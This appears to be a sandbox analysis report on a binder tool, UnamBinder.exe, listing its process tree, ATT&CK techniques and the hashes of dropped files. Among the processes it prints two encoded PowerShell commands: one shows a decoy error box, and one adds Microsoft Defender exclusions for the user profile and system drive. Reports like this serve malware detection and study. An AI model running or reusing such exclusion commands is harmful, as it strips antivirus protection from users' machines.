- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:932
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAYgB4ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGEAeAB0ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAZgBnAG4AJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGQAZwB2ACMAPgA="
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2280
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAbQB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAdgBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAbQBtACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAYQBwACMAPgA="
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4368
- C:\Users\Admin\Desktop\UnamBinder.exe
  "C:\Users\Admin\Desktop\UnamBinder.exe"
  2⤵
  - Executes dropped EXE
  PID:5000
- C:\Users\Admin\UnamBinder.exe
  "C:\Users\Admin\UnamBinder.exe"
  2⤵
  - Executes dropped EXE
  PID:4672

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:3296

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:5116

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2272
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc2cdeab58,0x7ffc2cdeab68,0x7ffc2cdeab78
  2⤵
  PID:2664
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1616 --field-trial-handle=1844,i,3629301155654374059,12894031479584234686,131072 /prefetch:2
  2⤵
  PID:1564
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2000 --field-trial-handle=1844,i,3629301155654374059,12894031479584234686,131072 /prefetch:8
  2⤵
  PID:2736
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2208 --field-trial-handle=1844,i,3629301155654374059,12894031479584234686,131072 /prefetch:8
  2⤵
  PID:4656
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3060 --field-trial-handle=1844,i,3629301155654374059,12894031479584234686,131072 /prefetch:1
  2⤵
  PID:1740
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3092 --field-trial-handle=1844,i,3629301155654374059,12894031479584234686,131072 /prefetch:1
  2⤵
  PID:2808
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3508 --field-trial-handle=1844,i,3629301155654374059,12894031479584234686,131072 /prefetch:1
  2⤵
  PID:2824
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4568 --field-trial-handle=1844,i,3629301155654374059,12894031479584234686,131072 /prefetch:8
  2⤵
  PID:3856
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4740 --field-trial-handle=1844,i,3629301155654374059,12894031479584234686,131072 /prefetch:8
  2⤵
  PID:4836
- C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe
  "C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --reenable-autoupdates --system-level
  2⤵
  PID:3000
- - C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe
    "C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x258,0x25c,0x260,0x234,0x264,0x7ff753ceae48,0x7ff753ceae58,0x7ff753ceae68
    3⤵
    PID:3976
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4784 --field-trial-handle=1844,i,3629301155654374059,12894031479584234686,131072 /prefetch:1
  2⤵
  PID:2216
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4080 --field-trial-handle=1844,i,3629301155654374059,12894031479584234686,131072 /prefetch:1
  2⤵
  PID:5108
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3196 --field-trial-handle=1844,i,3629301155654374059,12894031479584234686,131072 /prefetch:1
  2⤵
  PID:1380
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3148 --field-trial-handle=1844,i,3629301155654374059,12894031479584234686,131072 /prefetch:1
  2⤵
  PID:1428
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4884 --field-trial-handle=1844,i,3629301155654374059,12894031479584234686,131072 /prefetch:1
  2⤵
  PID:240

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:3388

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:2916
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:1028
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1028.0.452389943\452771825" -parentBuildID 20230214051806 -prefsHandle 1756 -prefMapHandle 1732 -prefsLen 22074 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ef099914-57fd-45b6-bc6a-1bb8e818e726} 1028 "\\.\pipe\gecko-crash-server-pipe.1028" 1848 1e5cf03e258 gpu
    3⤵
    PID:3016
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1028.1.1576352185\2046080628" -parentBuildID 20230214051806 -prefsHandle 2360 -prefMapHandle 2356 -prefsLen 22110 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6dd356e4-6577-42fb-a5ef-70e9ff3f1159} 1028 "\\.\pipe\gecko-crash-server-pipe.1028" 2372 1e5bac89f58 socket
    3⤵
    - Checks processor information in registry
    PID:348
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1028.2.1488935529\811000811" -childID 1 -isForBrowser -prefsHandle 2868 -prefMapHandle 2640 -prefsLen 22148 -prefMapSize 235121 -jsInitHandle 1332 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {342068d2-5fa1-4162-94d5-8120dc0b7bc4} 1028 "\\.\pipe\gecko-crash-server-pipe.1028" 3032 1e5d1d08858 tab
    3⤵
    PID:2364
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1028.3.132678579\1363350693" -childID 2 -isForBrowser -prefsHandle 3532 -prefMapHandle 3528 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1332 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6c14fedd-bf52-476b-aa43-08803e563c19} 1028 "\\.\pipe\gecko-crash-server-pipe.1028" 3544 1e5d4a0f858 tab
    3⤵
    PID:4780
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1028.4.814876714\1313674534" -childID 3 -isForBrowser -prefsHandle 5064 -prefMapHandle 5068 -prefsLen 27690 -prefMapSize 235121 -jsInitHandle 1332 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9169d24a-696f-437c-bce4-553c2ba4b96a} 1028 "\\.\pipe\gecko-crash-server-pipe.1028" 5044 1e5d695e958 tab
    3⤵
    PID:2036
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1028.5.195097608\618615455" -childID 4 -isForBrowser -prefsHandle 5144 -prefMapHandle 5148 -prefsLen 27690 -prefMapSize 235121 -jsInitHandle 1332 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {97948c37-d707-4c83-8756-1bac3273945b} 1028 "\\.\pipe\gecko-crash-server-pipe.1028" 5136 1e5d695f258 tab
    3⤵
    PID:240
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1028.6.1973132125\2010847460" -childID 5 -isForBrowser -prefsHandle 5428 -prefMapHandle 5424 -prefsLen 27690 -prefMapSize 235121 -jsInitHandle 1332 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5cc84189-5104-43af-81c1-c7006346e0ab} 1028 "\\.\pipe\gecko-crash-server-pipe.1028" 5436 1e5d6f06258 tab
    3⤵
    PID:4960
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1028.7.796586081\376566212" -childID 6 -isForBrowser -prefsHandle 3504 -prefMapHandle 3500 -prefsLen 27769 -prefMapSize 235121 -jsInitHandle 1332 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8cf8803a-f807-448c-abcf-c3f5a4fea6d7} 1028 "\\.\pipe\gecko-crash-server-pipe.1028" 3512 1e5d51b1658 tab
    3⤵
    PID:2100

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\4f7ed6a9-ef75-41c5-8bb3-c3d1558f510e.tmp

Filesize
257KB

MD5
3c95142d4b7d6ea98031b1f0dcb667d3

SHA1
6b119bc5e7d29488682594ce34b6f82cca614458

SHA256
38a49e81f7040ca52bcd719255ba56562c1364b4aa783ac634f83217118da7ce

SHA512
0be79413678d1c178f64594b09719d9e2d78a9f8fde31b215e6e916aad02c7c83e08011599acc2a1dd8559a6a724299f730f66e9c25a717fdb488ca7f4588704

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
810B

MD5
b192d865b6afa5e46764bb8158d3bf34

SHA1
164734b5f2b0eadd750d3fb6d6da042fb6c437b0

SHA256
ed11207bc4807f4f1c2c5a6f92dc8599642dd3d94e9566973ea0ba602272ec66

SHA512
1469d8b0651a11cf2cb910988c38e175f638319c5f27fa6782a173f073ba800c82e9aa3b0e86031ae652f4e1cfd5819413ee75c253912c58ad9f298a0abb4ab4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
d85d2cea4dc9ff6ea57cc0cd56f33bee

SHA1
ef33fc8c5399d435c87ccc89a842d8d0bc9ff3c6

SHA256
db551a309d9e43b15a0f1ddf711aaa9f88066d4b59ee8ad6b52855704b80ca78

SHA512
5e44c98ea79035d0575287b487e8b94d3782317f74c55ac39b69ec01a7cdedf2ecd52c662a6e8750d0673fa1df24ed2b212d8331105d0b85faf29445a5325df0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
257KB

MD5
2c4c795c61eb699c35b895dbb6e45ee3

SHA1
9231a0de469b67dbe37bad8d8a51d82a6735759e

SHA256
9fcd336f93418f2aabf1a6e2725cde0c783498f96aee029fa5f9fffd5df855e9

SHA512
fca8c6bd6a06e0fe2ad664e2f39c905f70bb1ea7ab82b37c28fa7aa4c150bb4fbef64df822f90f5989c20b5f1e0bc515e3cf6a7eed8fd35c314bf601b6a8eb90

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
257KB

MD5
cce91f3d878b3b5829171871435228f0

SHA1
72929a080ca588ddb2de647681e18addf7ec70c3

SHA256
259495f5787d8f4772fcca1b0f4bfa6e8c875be9c299ba0a8405fcb620aeae93

SHA512
1898113152ef8f6d8b4a4bff3e4d3292a0b3494da79d3d8d32ed9b3d1482894baedefebd3316366703ecbb2e34e3970e9ce83442d3fca66a66d5c4475dceb8b1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\mg2c1myw.default-release\activity-stream.discovery_stream.json.tmp

Filesize
23KB

MD5
f2b09c9bbac325d8e217f707b3bb88d3

SHA1
368bc7eda64c9f49b8265a6ece4674143cb535e6

SHA256
009f0a6c6e6d015411b22f2c51274ce06abb8db3cd413a531c1506f5c921ac44

SHA512
fe5d325eb058c1f373aa01090327924e53bda500edc3cc62c2c652f94a7e209b69721e220a89ad3e3c7709142d4632b89364c4798d1a6c89f505def0b7ed315e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vwwz5zwv.3do.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mg2c1myw.default-release\prefs-1.js

Filesize
7KB

MD5
f2f3d05e30ed3af8292319579832c113

SHA1
33d3d88e6f0674753426fca3c6ebc1de8da13876

SHA256
c773c4f9dd807f39c609aca4de9514d6ddccbe355b72d4865b55dd74edf6eca7

SHA512
dd7de8451658e80cce393eb7d091f6a1b695493e94386080e719826f20b6d3e09fe7c65b34fbe3d9afc7853c08fe30f4098d87026e2357b6946c561ded070e41

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mg2c1myw.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
1KB

MD5
e8718f621d546435b6fa4ab39bd49377

SHA1
d0af77ee9d03297e8163fb8c17584820713ddbd5

SHA256
36aa870567a45b39fb0b8855257101f2e328d125fc3c810139043f964f36bc75

SHA512
71b6486acf5531a17a93eb1cbb95e927c095330b91ee4e96537900e68ea5c9b4a339ebc0b74dc08012b1cf00725dede759c2485d31de2007722e1d0241506ef4

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mg2c1myw.default-release\sessionstore.jsonlz4

Filesize
1KB

MD5
9a8d2b2c54cec0cfca8e87c4538c181d

SHA1
477a1d385e51ef5eb0e3ceda412b76979ea1a1bf

SHA256
4cd1a60ef5fb453e8149727f706a71cefe16ff67ac5c77a908bc83315cac2ef0

SHA512
8497c4b96faa4b7864c002823b08c9874a87063bf95879261f14bce9b57a55aeda0bc8977bb3ae3d1e7f0034f2408992cb872e3a98ce241347de69ace27b5af8

Download Submit
C:\Users\Admin\Desktop\Compilers\MinGW64\bin\gcc.exe

Filesize
789KB

MD5
43acaac9b437bd941c793ca6d9e776f7

SHA1
c7de884538ea84e50127331fde9642c4b99fa966

SHA256
27d8ea1223c1cf411773a39e8ef406d1f1d5d8956a0351ba8c74cc6c87978258

SHA512
6587acc6c03afdfb7ac5e48f01978832dac491f9cdd86d1bc68f997e85000056cbfe6c27462ec3713c4bfad139f7a4937a0258eed98cede48dddacc2f17cac2d

Download Submit
C:\Users\Admin\Desktop\Compilers\MinGW64\bin\libiconv-2.dll

Filesize
912KB

MD5
661d92527d19257cba74a711bd3a5666

SHA1
5c02b30aa0facdce317b981eba7a46827942e783

SHA256
5e3e889409110f7b7c2400f522b31d77b64fb3ab76ccfb9733acde34a07b7ad3

SHA512
b9a5a59a82abae523db746f48465bdadd655f6553c9dfef92a3b14fd2d561e67c90605ce01210c7476c77ed688e8ef398e25ed5f319492a79cf8284dae8398a8

Download Submit
C:\Users\Admin\Desktop\Compilers\MinGW64\bin\windres.exe

Filesize
1.1MB

MD5
18cd4a34ca3111b58afd6b45d4c92817

SHA1
c1e73bf677aa8cec0cf2d11e196cceed24235a31

SHA256
f245956c930f220f0bedf355a751a5cd738b4ec6bb6c5d584199ab3fa6c0a1c4

SHA512
088207b82c8523e9c1e12f0d47eea05020ebb03e76306be891ce7c371c2ae0507037697336fc88a25fefa8f451cb83acb1adc6f9d1488917df8291e1f9e7546e

Download Submit
C:\Users\Admin\Desktop\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe

Filesize
12.5MB

MD5
72d8fe1f322d4eadbe4b825d0fbba8e3

SHA1
14111de0cf33c5608e2d800e96f0bdb8132b7105

SHA256
6ce68e248fb64e366aaa6a5fe34fbf530299337de34f03d51dac6b59c86b9a0d

SHA512
5f0e73be9ad6f5661b8a9a276966122c96453f73cf6f2dbbf10ac31eee8888c20217ac0b608f69e8302029352e620036804ee8733a5e5e62a104adad9245ffcb

Download Submit
C:\Users\Admin\Desktop\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\libcloog-isl-3.dll

Filesize
118KB

MD5
301bccd39510e47ba9bcb199c15319f7

SHA1
a1c0ade259f3c504e0a3d2a06b1f23218f15f0f7

SHA256
ff6cadf145cd39b19af0b4183eb7c98bbe2e9195d03ded4117be153052ad46bc

SHA512
2d692d7581ad3dc95c6222b02628dd805748ccaf5276674d5f4633d3cfc64847a6d81b87f9c82a1f866e4a0a3b48493671db4e3caf6d400304eb547c6ead3997

Download Submit
C:\Users\Admin\Desktop\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\libgmp-3.dll

Filesize
416KB

MD5
fe5c6a36e0a8829823ba55b9d6429521

SHA1
b0fcdefd0c045c8d5b2bb7e1a95cf6a0938c8b9b

SHA256
3bd2deaddc781222f78722e1b734a91da27b9f0e679238e624d83015506a2a54

SHA512
c1134a9e515db42ac062de0a79995a7d5cc44ad67461ba960ef3239c4ce467c10af4c3a5017c0ad75197b82f3f9df53bb975e5af01ef07430e6414d13252c39c

Download Submit
C:\Users\Admin\Desktop\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\libiconv-2.dll

Filesize
912KB

MD5
48e2735197d6dcdb9e770de6c9f6da6c

SHA1
2048bc4f47230541d4c41706ab63e2f2cdd0a178

SHA256
ba2285e9081fc62a7bf6f6bb3deaef88b43df5312d2aa2c5216ca061e0b3f462

SHA512
73a15c57cbfe79e69a1361833d667cdea0e12154c7ab79a31519eb507dc145e07bbae320aef62e69f94f4570bbbbfdcd15e345d491448ab54a06b3343455044f

Download Submit
C:\Users\Admin\Desktop\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\libisl-10.dll

Filesize
910KB

MD5
22ae27db2aa723df78bfb0082c8d655c

SHA1
13c22b295c23e838fded260d3dd68370f9fead17

SHA256
1d210067f31ba2d8135416c61805b22fb191add0ab2165e6da4ef549a8fab5fc

SHA512
04486ed3ce9dab682bf8307391c98c9e191805b777ba9bd490290b9a30bb53aecf8859a918ed6da0f11e52fdeec3012618a77d9895ea59edb847c33685add32c

Download Submit
C:\Users\Admin\Desktop\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\libmpc-2.dll

Filesize
73KB

MD5
06bd9185c36cf58b25f3cb76eb8cca45

SHA1
aacb00411e2870f4e21b986bd73bd270f25b4468

SHA256
615088d6ae8eb77a6cfed97616a76a992843794f67a6d0e2a496dd1298a9b5ad

SHA512
a3c15d0482545091ca1de236987b12af3db4f81aadd65b306a5d04fd4dcd3f3d11759f9ea247dfeaa8e8675e038ba92cb16d1b549a8c4fc474a8acec900d5af0

Download Submit
C:\Users\Admin\Desktop\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\libmpfr-1.dll

Filesize
323KB

MD5
5610d32d53b668c95c69b530c2250dd7

SHA1
bd7e2953c438fd5e8d0a353f7f07685055ba80c9

SHA256
33180906b102967534f32d640c43b9e4bf7de7c4967368a76349d45e8b490b4a

SHA512
2cfd8f398b14e76ca051a17fa2366470c2aefe0c0ceebc1b609682f2decd7ee28df13b2a0419eb6258e484d6d549ddb321d11506dc884a254d227d9a439fbfd5

Download Submit
C:\Users\Admin\Desktop\Compilers\tinycc\libtcc.dll

Filesize
221KB

MD5
018d32ce36c442b94c89a112282106ba

SHA1
d64c9b5ade44b0c766790581d31d2925f80c8fe8

SHA256
5673e555abaf7adc8856c04e2ecb63fee657aca2c1cf538f7bf4ddcfba8b78fd

SHA512
cc77978a01379cbae0c45447bb8dcbc3bee99d6fce5eecbf0b5128ca965ecc71a1b86f6ec8eef79eeb4b79af1a2f9f436eecbac2ec5880f2c10e3a5cb2cbede7

Download Submit
C:\Users\Admin\Desktop\Compilers\tinycc\tcc.exe

Filesize
53KB

MD5
08c121c2147e21032d5212f3d430660a

SHA1
e93e7cca5c3ba779a36fb14e5fdb3182d745279a

SHA256
54f013a8811498a3bd20d8440a497698de96b659930001874f7c7f638f887d1d

SHA512
7b4eddb5e77d78640b56c4b970f96070bd7ed6d281f9a2d5895e7a1b4361cb5edb027068b087d71363ad617609109e6c42795022ec46b16a48cd2b468f711d27

Download Submit
C:\Users\Admin\Desktop\UnamBinder.exe

Filesize
9.4MB

MD5
70565dbd654937df2eaefc7c79941169

SHA1
5cb8daf1185704a9772f07dcec2e499149517715

SHA256
a90ba5a56422c0d2a41f28da056affd69cc8929e14dcdab1583ec96b50b8e28d

SHA512
64b89f77d6528c838c0288c59203455ea3318028816d4426f818c6b8c3258d8e5e13242b175d7b3402547cfd5a0acddb212b9f9b5bbf5d259cd4befc2d078a4c

Download Submit
C:\Users\Admin\Desktop\loader.manifest

Filesize
687B

MD5
9bf68a9d5a870e8963d8581208ca515c

SHA1
83b87bb49beedbb51940069ec6ffc296c486ef5f

SHA256
213ac5251339d7ed8db9d833ef1d7f0784e76ed65a553f3509e9b4ccbc7169b2

SHA512
5d9b5c13762c2bd3c0a93353b74de083d9d6a5e566e273f35bac5c2dc45f65226a3d2524f780ddea5078896390ad884b9153a4982d8a9c79e25ed33bddf84037

Download Submit
C:\Users\Admin\Desktop\omg.c

Filesize
20.0MB

MD5
ac16c5ed4fec4775f417c3b899288e09

SHA1
17c4fe647782da247d3628f5624ffdc8ad534c36

SHA256
48595f48d0b00aade0febe605ee93b4770499b3f275bc0ce02a3dc42a8258706

SHA512
bc8035a4ecb160aeca589646ae2e9400058d9d6c3e33cb382a8def0b607a43807cd23e16fabf076e8c3191f12a46736e8df896319aa26deb1d6980df02ea5eca

Download Submit
C:\Users\Admin\Desktop\resource.o

Filesize
868B

MD5
f8f07ac66de8420ae7cff20d2b4dd14c

SHA1
ad53ddc3bb680dd0dab1d244dd7e8880ba93607d

SHA256
8ef2f32b733b959af5e13c75bb56b76acd5b6d3fd9b233d7e099c9ce535e9f10

SHA512
49efea3509c582059bf24d2d6a8bb6c0d05517d11fe6c798b4558c026f99b08becff49762a7e1357351a2731a5cae6e0b42d266b0f97dff1cd1b640df7f9907f

Download Submit
C:\Users\Admin\Desktop\resource.rc

Filesize
724B

MD5
b5245a8f8de776b9c0baf1c20e02c539

SHA1
5859b4cd4a3170d3ed7575e5df6dea242dff88ca

SHA256
